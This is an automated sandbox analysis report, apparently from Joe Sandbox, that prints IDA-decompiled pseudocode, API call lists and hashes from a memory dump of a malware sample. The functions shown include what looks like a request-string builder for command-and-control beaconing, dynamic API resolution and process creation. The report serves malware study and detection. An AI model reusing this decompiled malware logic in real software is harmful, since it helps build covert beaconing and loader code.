									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x47ea388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x47ea388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x47ea3c8 = 1;
							__eflags =  *0x47ea3c8;
							if( *0x47ea3c8 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x47ea388 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x47ea388 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x47ea3c8 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x47ea388 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x47ea380 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x47ea388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x47ea388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x047e855b
0x047e855e
0x047e8564
0x047e8582
0x00000000
0x047e8582
0x047e856c
0x047e8575
0x047e857b
0x047e858a
0x047e858d
0x047e8590
0x047e859a
0x047e859a
0x047e859c
0x047e859f
0x047e85a1
0x047e85a1
0x047e85a3
0x047e85a6
0x00000000
0x00000000
0x047e85a8
0x047e85aa
0x047e8610
0x047e8610
0x047e876e
0x00000000
0x047e876e
0x047e85ac
0x047e85ac
0x047e85b0
0x047e85b2
0x047e85b2
0x047e85b2
0x047e85b2
0x047e85b5
0x047e85b6
0x047e85b9
0x047e85b9
0x047e85bd
0x047e85c1
0x047e85cf
0x047e85cf
0x047e85d7
0x047e85dd
0x047e85df
0x047e85e1
0x047e85f1
0x047e85fe
0x047e8602
0x047e8607
0x047e8609
0x047e8687
0x047e8687
0x047e860b
0x047e860b
0x047e860b
0x047e8689
0x047e868b
0x047e876c
0x047e876c
0x00000000
0x047e8691
0x047e8691
0x047e8698
0x00000000
0x00000000
0x047e869e
0x047e86a2
0x047e86fe
0x047e8700
0x047e8708
0x047e870a
0x047e870c
0x00000000
0x00000000
0x047e870e
0x047e8714
0x047e8716
0x047e8718
0x047e872d
0x047e872d
0x047e872f
0x047e875e
0x047e8765
0x00000000
0x047e8765
0x047e8733
0x047e8734
0x047e8736
0x047e8738
0x047e8738
0x047e873a
0x047e873c
0x047e873e
0x047e8752
0x047e8752
0x047e8755
0x047e8757
0x047e8757
0x047e8758
0x047e8758
0x00000000
0x047e8740
0x047e8740
0x047e8740
0x047e8749
0x047e874a
0x047e874c
0x047e874e
0x047e874e
0x00000000
0x047e8740
0x047e873e
0x047e871a
0x047e8721
0x047e8721
0x047e8723
0x00000000
0x00000000
0x047e8725
0x047e8726
0x047e8729
0x047e872b
0x00000000
0x00000000
0x00000000
0x047e872b
0x00000000
0x047e8721
0x047e86a4
0x047e86a7
0x047e86ac
0x00000000
0x00000000
0x047e86b5
0x047e86b7
0x047e86bd
0x00000000
0x00000000
0x047e86c3
0x047e86c9
0x00000000
0x00000000
0x047e86cf
0x047e86d1
0x047e86da
0x047e86de
0x00000000
0x00000000
0x047e86e4
0x047e86e7
0x047e86e9
0x00000000
0x00000000
0x047e86f0
0x047e86f2
0x00000000
0x00000000
0x047e86f4
0x047e86f8
0x00000000
0x00000000
0x00000000
0x047e86f8
0x00000000
0x00000000
0x00000000
0x047e85e3
0x047e85e3
0x047e85e3
0x047e85ea
0x00000000
0x00000000
0x047e85ec
0x047e85ed
0x047e85ef
0x00000000
0x00000000
0x00000000
0x047e85ef
0x047e8617
0x047e8619
0x00000000
0x00000000
0x047e8629
0x047e862b
0x047e862d
0x00000000
0x00000000
0x047e8633
0x047e863a
0x047e8666
0x047e8666
0x047e8668
0x047e866a
0x047e867e
0x047e8680
0x00000000
0x00000000
0x00000000
0x00000000
0x047e866c
0x047e866c
0x047e866c
0x047e8675
0x047e8676
0x047e8678
0x047e867a
0x047e867a
0x00000000
0x047e866c
0x047e863c
0x047e863c
0x047e863f
0x047e8641
0x047e8653
0x047e8653
0x047e8656
0x047e8658
0x047e8658
0x047e8659
0x047e8659
0x047e865f
0x047e865f
0x00000000
0x00000000
0x00000000
0x00000000
0x047e8643
0x047e8643
0x047e8643
0x047e864a
0x00000000
0x00000000
0x047e864c
0x047e864c
0x047e864d
0x00000000
0x00000000
0x00000000
0x047e864d
0x047e864f
0x047e8651
0x047e8664
0x00000000
0x00000000
0x00000000
0x047e8664
0x00000000
0x047e8651
0x047e85c3
0x047e85c6
0x047e85c9
0x00000000
0x00000000
0x047e85cb
0x047e85cd
0x00000000
0x00000000
0x00000000
0x047e85cd
0x047e8592
0x047e8594
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 047E8602

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: af4e6450ccf0f7152a26077d9dc8f91846882e38aacb435e1f84a5767a3e981f
Instruction ID: 2f36054a6ca0cb02fa941724ffede459591b863e860284ccc701c266845d4456
Opcode Fuzzy Hash: af4e6450ccf0f7152a26077d9dc8f91846882e38aacb435e1f84a5767a3e981f
Instruction Fuzzy Hash: C361F431700601DFDB29EF6BC98067973A5FB8D354B268B29D416DB392E731F842C652

Uniqueness

Uniqueness Score: -1.00%

Function 047E832C Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E047E832C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E047E8497(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E047E8551(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E047E843C(_t55, _t66);
										_t89 = _t66 + 0x10;
										E047E8497(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E047E8533(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x047e8330
0x047e8331
0x047e8332
0x047e8335
0x047e8337
0x047e833a
0x047e833b
0x047e833d
0x047e833e
0x047e833f
0x047e8342
0x047e834c
0x047e83fd
0x047e8404
0x047e840d
0x047e8352
0x047e8352
0x047e8358
0x047e835e
0x047e8361
0x047e8364
0x047e8368
0x047e836d
0x047e8372
0x047e83f2
0x00000000
0x047e8374
0x047e8374
0x047e8380
0x047e8382
0x047e83dd
0x047e83dd
0x047e83e3
0x00000000
0x047e8384
0x047e8393
0x047e8395
0x047e8396
0x047e8397
0x047e839a
0x047e839a
0x047e839c
0x00000000
0x047e839e
0x047e839e
0x047e83e8
0x047e83a0
0x047e83a0
0x047e83a4
0x047e83ac
0x047e83b1
0x047e83b6
0x047e83c2
0x047e83ca
0x047e83d1
0x047e83d7
0x047e83db
0x00000000
0x047e83db
0x047e839e
0x047e839c
0x00000000
0x047e8382
0x047e83f6
0x047e83f6
0x047e83f6
0x047e8372
0x047e8412
0x047e8419

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction ID: 1ad74d4aaddc240006c5acfa68b3f911fc3cd977eeb6c6d781eba4f65c51e9c5
Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction Fuzzy Hash: E021A4329002049FDB10EF69C8C49BBBBA5FF49350B468269D9559B345EB30F915CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 047E2B91 Relevance: 45.8, APIs: 25, Strings: 1, Instructions: 278
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E047E2B91(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
				intOrPtr _v4;
				signed int _v8;
				int* _v12;
				char* _v16;
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				void* __ebx;
				void* __edi;
				long _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				void* _t76;
				intOrPtr _t77;
				int _t80;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				intOrPtr _t87;
				void* _t89;
				void* _t92;
				intOrPtr _t96;
				intOrPtr _t100;
				intOrPtr* _t102;
				int* _t108;
				int* _t118;
				char** _t120;
				char* _t121;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t132;
				intOrPtr _t135;
				intOrPtr _t139;
				int _t142;
				intOrPtr _t144;
				int _t147;
				intOrPtr _t148;
				int _t151;
				void* _t152;
				intOrPtr _t166;
				void* _t168;
				int _t169;
				void* _t170;
				void* _t171;
				long _t172;
				intOrPtr* _t173;
				intOrPtr* _t174;
				intOrPtr _t175;
				intOrPtr* _t178;
				char** _t181;
				char** _t183;
				char** _t184;
				void* _t189;

				_t68 = __eax;
				_t181 =  &_v16;
				_t152 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t68 = GetTickCount();
				}
				_t69 =  *0x47ea018; // 0x9e6833dc
				asm("bswap eax");
				_t70 =  *0x47ea014; // 0x3a87c8cd
				asm("bswap eax");
				_t71 =  *0x47ea010; // 0xd8d2f808
				asm("bswap eax");
				_t72 =  *0x47ea00c; // 0x13d015ef
				asm("bswap eax");
				_t73 =  *0x47ea348; // 0xc3d5a8
				_t3 = _t73 + 0x47eb5ac; // 0x74666f73
				_t169 = wsprintfA(_t152, _t3, 3, 0x3d18f, _t72, _t71, _t70, _t69,  *0x47ea02c,  *0x47ea004, _t68);
				_t76 = E047E467F();
				_t77 =  *0x47ea348; // 0xc3d5a8
				_t4 = _t77 + 0x47eb575; // 0x74707526
				_t80 = wsprintfA(_t169 + _t152, _t4, _t76);
				_t183 =  &(_t181[0xe]);
				_t170 = _t169 + _t80;
				if(_a24 != 0) {
					_t148 =  *0x47ea348; // 0xc3d5a8
					_t8 = _t148 + 0x47eb508; // 0x732526
					_t151 = wsprintfA(_t170 + _t152, _t8, _a24);
					_t183 =  &(_t183[3]);
					_t170 = _t170 + _t151;
				}
				_t81 =  *0x47ea348; // 0xc3d5a8
				_t10 = _t81 + 0x47eb89e; // 0x5428e46
				_t153 = _t10;
				_t189 = _a20 - _t10;
				_t12 = _t81 + 0x47eb246; // 0x74636126
				_t164 = 0 | _t189 == 0x00000000;
				_t171 = _t170 + wsprintfA(_t170 + _t152, _t12, _t189 == 0);
				_t85 =  *0x47ea36c; // 0x54295b0
				_t184 =  &(_t183[3]);
				if(_t85 != 0) {
					_t144 =  *0x47ea348; // 0xc3d5a8
					_t16 = _t144 + 0x47eb8be; // 0x3d736f26
					_t147 = wsprintfA(_t171 + _t152, _t16, _t85);
					_t184 =  &(_t184[3]);
					_t171 = _t171 + _t147;
				}
				_t86 = E047E472F(_t153);
				_a32 = _t86;
				if(_t86 != 0) {
					_t139 =  *0x47ea348; // 0xc3d5a8
					_t19 = _t139 + 0x47eb8d0; // 0x736e6426
					_t142 = wsprintfA(_t171 + _t152, _t19, _t86);
					_t184 =  &(_t184[3]);
					_t171 = _t171 + _t142;
					HeapFree( *0x47ea2d8, 0, _a40);
				}
				_t87 = E047E1340();
				_a32 = _t87;
				if(_t87 != 0) {
					_t135 =  *0x47ea348; // 0xc3d5a8
					_t23 = _t135 + 0x47eb8c5; // 0x6f687726
					wsprintfA(_t171 + _t152, _t23, _t87);
					_t184 =  &(_t184[3]);
					HeapFree( *0x47ea2d8, 0, _a40);
				}
				_t166 =  *0x47ea3cc; // 0x5429600
				_t89 = E047E6B59(0x47ea00a, _t166 + 4);
				_t172 = 0;
				_a16 = _t89;
				if(_t89 == 0) {
					L30:
					HeapFree( *0x47ea2d8, _t172, _t152);
					return _a44;
				} else {
					_t92 = RtlAllocateHeap( *0x47ea2d8, 0, 0x800);
					_a24 = _t92;
					if(_t92 == 0) {
						L29:
						HeapFree( *0x47ea2d8, _t172, _a8);
						goto L30;
					}
					E047E2915(GetTickCount());
					_t96 =  *0x47ea3cc; // 0x5429600
					__imp__(_t96 + 0x40);
					asm("lock xadd [eax], ecx");
					_t100 =  *0x47ea3cc; // 0x5429600
					__imp__(_t100 + 0x40);
					_t102 =  *0x47ea3cc; // 0x5429600
					_t168 = E047E6675(1, _t164, _t152,  *_t102);
					asm("lock xadd [eax], ecx");
					if(_t168 == 0) {
						L28:
						HeapFree( *0x47ea2d8, _t172, _a16);
						goto L29;
					}
					StrTrimA(_t168, 0x47e9280);
					_push(_t168);
					_t108 = E047E7563();
					_v12 = _t108;
					if(_t108 == 0) {
						L27:
						HeapFree( *0x47ea2d8, _t172, _t168);
						goto L28;
					}
					_t173 = __imp__;
					 *_t173(_t168, _a8);
					 *_t173(_a4, _v12);
					_t174 = __imp__;
					 *_t174(_v4, _v24);
					_t175 = E047E6536( *_t174(_v12, _t168), _v20);
					_v36 = _t175;
					if(_t175 == 0) {
						_v8 = 8;
						L25:
						E047E63F6();
						L26:
						HeapFree( *0x47ea2d8, 0, _v40);
						_t172 = 0;
						goto L27;
					}
					_t118 = E047E6F7D(_t152, 0xffffffffffffffff, _t168,  &_v24);
					_v12 = _t118;
					if(_t118 == 0) {
						_t178 = _v24;
						_v20 = E047E597D(_t178, _t175, _v16, _v12);
						_t126 =  *((intOrPtr*)(_t178 + 8));
						 *((intOrPtr*)( *_t126 + 0x80))(_t126);
						_t128 =  *((intOrPtr*)(_t178 + 8));
						 *((intOrPtr*)( *_t128 + 8))(_t128);
						_t130 =  *((intOrPtr*)(_t178 + 4));
						 *((intOrPtr*)( *_t130 + 8))(_t130);
						_t132 =  *_t178;
						 *((intOrPtr*)( *_t132 + 8))(_t132);
						E047E61DA(_t178);
					}
					if(_v8 != 0x10d2) {
						L20:
						if(_v8 == 0) {
							_t120 = _v16;
							if(_t120 != 0) {
								_t121 =  *_t120;
								_t176 =  *_v12;
								_v16 = _t121;
								wcstombs(_t121, _t121,  *_v12);
								 *_v24 = E047E673A(_v16, _v16, _t176 >> 1);
							}
						}
						goto L23;
					} else {
						if(_v16 != 0) {
							L23:
							E047E61DA(_v32);
							if(_v12 == 0 || _v8 == 0x10d2) {
								goto L26;
							} else {
								goto L25;
							}
						}
						_v8 = _v8 & 0x00000000;
						goto L20;
					}
				}
			}

0x047e2b91
0x047e2b91
0x047e2b95
0x047e2b9c
0x047e2ba6
0x047e2ba8
0x047e2ba8
0x047e2bb5
0x047e2bc0
0x047e2bc3
0x047e2bce
0x047e2bd1
0x047e2bd6
0x047e2bd9
0x047e2bde
0x047e2be1
0x047e2bed
0x047e2bfa
0x047e2bfc
0x047e2c02
0x047e2c07
0x047e2c12
0x047e2c14
0x047e2c17
0x047e2c1e
0x047e2c20
0x047e2c29
0x047e2c34
0x047e2c36
0x047e2c39
0x047e2c39
0x047e2c3b
0x047e2c40
0x047e2c40
0x047e2c48
0x047e2c4c
0x047e2c52
0x047e2c5d
0x047e2c5f
0x047e2c64
0x047e2c69
0x047e2c6c
0x047e2c71
0x047e2c7c
0x047e2c7e
0x047e2c81
0x047e2c81
0x047e2c83
0x047e2c8e
0x047e2c94
0x047e2c97
0x047e2c9c
0x047e2ca7
0x047e2ca9
0x047e2cb0
0x047e2cba
0x047e2cba
0x047e2cbc
0x047e2cc1
0x047e2cc7
0x047e2cca
0x047e2ccf
0x047e2cd9
0x047e2cdb
0x047e2cea
0x047e2cea
0x047e2cec
0x047e2cfa
0x047e2cff
0x047e2d01
0x047e2d07
0x047e2ee7
0x047e2eef
0x047e2efc
0x047e2d0d
0x047e2d19
0x047e2d1f
0x047e2d25
0x047e2eda
0x047e2ee5
0x00000000
0x047e2ee5
0x047e2d31
0x047e2d36
0x047e2d3f
0x047e2d50
0x047e2d54
0x047e2d5d
0x047e2d63
0x047e2d70
0x047e2d7d
0x047e2d83
0x047e2ecd
0x047e2ed8
0x00000000
0x047e2ed8
0x047e2d8f
0x047e2d95
0x047e2d96
0x047e2d9b
0x047e2da1
0x047e2ec3
0x047e2ecb
0x00000000
0x047e2ecb
0x047e2dab
0x047e2db2
0x047e2dbc
0x047e2dc2
0x047e2dcc
0x047e2dde
0x047e2de0
0x047e2de6
0x047e2eff
0x047e2eae
0x047e2eae
0x047e2eb3
0x047e2ebf
0x047e2ec1
0x00000000
0x047e2ec1
0x047e2df1
0x047e2df6
0x047e2dfc
0x047e2e07
0x047e2e12
0x047e2e16
0x047e2e1c
0x047e2e22
0x047e2e28
0x047e2e2b
0x047e2e31
0x047e2e34
0x047e2e39
0x047e2e3d
0x047e2e3d
0x047e2e4a
0x047e2e58
0x047e2e5d
0x047e2e5f
0x047e2e65
0x047e2e6b
0x047e2e6d
0x047e2e72
0x047e2e76
0x047e2e92
0x047e2e92
0x047e2e65
0x00000000
0x047e2e4c
0x047e2e51
0x047e2e94
0x047e2e98
0x047e2ea2
0x00000000
0x00000000
0x00000000
0x00000000
0x047e2ea2
0x047e2e53
0x00000000
0x047e2e53
0x047e2e4a

APIs

GetTickCount.KERNEL32 ref: 047E2BA8
wsprintfA.USER32 ref: 047E2BF5
wsprintfA.USER32 ref: 047E2C12
wsprintfA.USER32 ref: 047E2C34
wsprintfA.USER32 ref: 047E2C5B
wsprintfA.USER32 ref: 047E2C7C
wsprintfA.USER32 ref: 047E2CA7
HeapFree.KERNEL32(00000000,?), ref: 047E2CBA
wsprintfA.USER32 ref: 047E2CD9
HeapFree.KERNEL32(00000000,?), ref: 047E2CEA

Part of subcall function 047E6B59: RtlEnterCriticalSection.NTDLL(054295C0), ref: 047E6B75
Part of subcall function 047E6B59: RtlLeaveCriticalSection.NTDLL(054295C0), ref: 047E6B93

RtlAllocateHeap.NTDLL(00000000,00000800), ref: 047E2D19
GetTickCount.KERNEL32 ref: 047E2D2B
RtlEnterCriticalSection.NTDLL(054295C0), ref: 047E2D3F
RtlLeaveCriticalSection.NTDLL(054295C0), ref: 047E2D5D

Part of subcall function 047E6675: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E66A0
Part of subcall function 047E6675: lstrlen.KERNEL32(00000000,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E66A8
Part of subcall function 047E6675: strcpy.NTDLL ref: 047E66BF
Part of subcall function 047E6675: lstrcat.KERNEL32(00000000,00000000), ref: 047E66CA
Part of subcall function 047E6675: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,047E3ECE,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E66E7

StrTrimA.SHLWAPI(00000000,047E9280,?,05429600), ref: 047E2D8F

Part of subcall function 047E7563: lstrlen.KERNEL32(05429BF8,00000000,00000000,00000000,047E3EF9,00000000), ref: 047E7573
Part of subcall function 047E7563: lstrlen.KERNEL32(?), ref: 047E757B
Part of subcall function 047E7563: lstrcpy.KERNEL32(00000000,05429BF8), ref: 047E758F
Part of subcall function 047E7563: lstrcat.KERNEL32(00000000,?), ref: 047E759A

lstrcpy.KERNEL32(00000000,?), ref: 047E2DB2
lstrcpy.KERNEL32(?,?), ref: 047E2DBC
lstrcat.KERNEL32(?,?), ref: 047E2DCC
lstrcat.KERNEL32(?,00000000), ref: 047E2DD3

Part of subcall function 047E6536: lstrlen.KERNEL32(?,00000000,05429E00,00000000,047E6F0A,0542A023,43175AC3,?,?,?,?,43175AC3,00000005,047EA00C,4D283A53,?), ref: 047E653D
Part of subcall function 047E6536: mbstowcs.NTDLL ref: 047E6566
Part of subcall function 047E6536: memset.NTDLL ref: 047E6578

wcstombs.NTDLL ref: 047E2E76

Part of subcall function 047E597D: SysAllocString.OLEAUT32(?), ref: 047E59B8

Part of subcall function 047E61DA: RtlFreeHeap.NTDLL(00000000,00000000,047E6383,00000000,?,00000000,00000000), ref: 047E61E6

HeapFree.KERNEL32(00000000,?), ref: 047E2EBF
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 047E2ECB
HeapFree.KERNEL32(00000000,?,?,05429600), ref: 047E2ED8
HeapFree.KERNEL32(00000000,?), ref: 047E2EE5
HeapFree.KERNEL32(00000000,?), ref: 047E2EEF

Strings

Uet, xrefs: 047E2C88

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: Heap$Free$wsprintf$lstrlen$CriticalSectionlstrcat$lstrcpy$CountEnterLeaveTickTrim$AllocAllocateStringmbstowcsmemsetstrcpywcstombs
String ID: Uet
API String ID: 1185349883-2766386878
Opcode ID: b0183d82b4dcceffd5d02c99bd320d54e8b761c0a35379de3d312ede195b0a5f
Instruction ID: 7073de73eb4a02edbc74763ca79cef038b39d79577a97ab7401413f5db48f6bb
Opcode Fuzzy Hash: b0183d82b4dcceffd5d02c99bd320d54e8b761c0a35379de3d312ede195b0a5f
Instruction Fuzzy Hash: BFA18C72500210AFD711DF66DC88EAA7BE8EF8C718F054A68F449DB221D739ED45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 047E37DF Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 109
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E047E37DF(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E047E6BF9(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E047E7AB0( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x47ea300 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x47ea348; // 0xc3d5a8
					_t18 = _t47 + 0x47eb706; // 0x73797325
					_t68 = E047E127E(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x47ea348; // 0xc3d5a8
						_t19 = _t50 + 0x47eb86c; // 0x5428e14
						_t20 = _t50 + 0x47eb3f6; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E047E5B56();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E047E5B56();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x47ea2d8, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E047E61DA(_t70);
				goto L12;
			}

0x047e37e7
0x047e37e7
0x047e37f6
0x047e37fd
0x047e3802
0x047e390f
0x047e3916
0x047e3916
0x047e3811
0x047e3819
0x047e381c
0x047e3821
0x047e3836
0x047e383c
0x047e383d
0x047e3840
0x047e3846
0x047e3849
0x047e384e
0x047e3856
0x047e3862
0x047e3866
0x047e38f6
0x047e386c
0x047e386c
0x047e3871
0x047e3878
0x047e388c
0x047e3890
0x047e38df
0x047e3892
0x047e3893
0x047e389a
0x047e38b3
0x047e38b5
0x047e38b9
0x047e38c0
0x047e38da
0x047e38c2
0x047e38cb
0x047e38d0
0x047e38d0
0x047e38c0
0x047e38ee
0x047e38ee
0x047e3866
0x047e38fd
0x047e3906
0x047e390a
0x00000000

APIs

Part of subcall function 047E6BF9: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,047E37FB,?,?,?,?,00000000,00000000), ref: 047E6C1E
Part of subcall function 047E6BF9: GetProcAddress.KERNEL32(00000000,7243775A), ref: 047E6C40
Part of subcall function 047E6BF9: GetProcAddress.KERNEL32(00000000,614D775A), ref: 047E6C56
Part of subcall function 047E6BF9: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 047E6C6C
Part of subcall function 047E6BF9: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 047E6C82
Part of subcall function 047E6BF9: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 047E6C98

memset.NTDLL ref: 047E3849

Part of subcall function 047E127E: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,047E3862,73797325), ref: 047E128F
